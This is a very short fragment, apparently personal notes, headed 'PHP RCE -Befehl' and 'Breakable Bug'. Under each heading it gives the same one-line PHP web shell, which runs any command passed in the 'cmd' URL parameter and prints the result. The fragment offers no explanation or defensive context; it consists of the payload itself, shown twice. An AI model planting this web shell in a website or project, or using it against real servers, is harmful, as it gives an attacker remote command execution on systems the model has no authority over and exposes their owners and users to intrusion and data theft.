PHP RCE -Befehl
<?php echo shell_exec($_GET['cmd']); ?>
Breakable Bug
<?php echo shell_exec($_GET['cmd']); ?>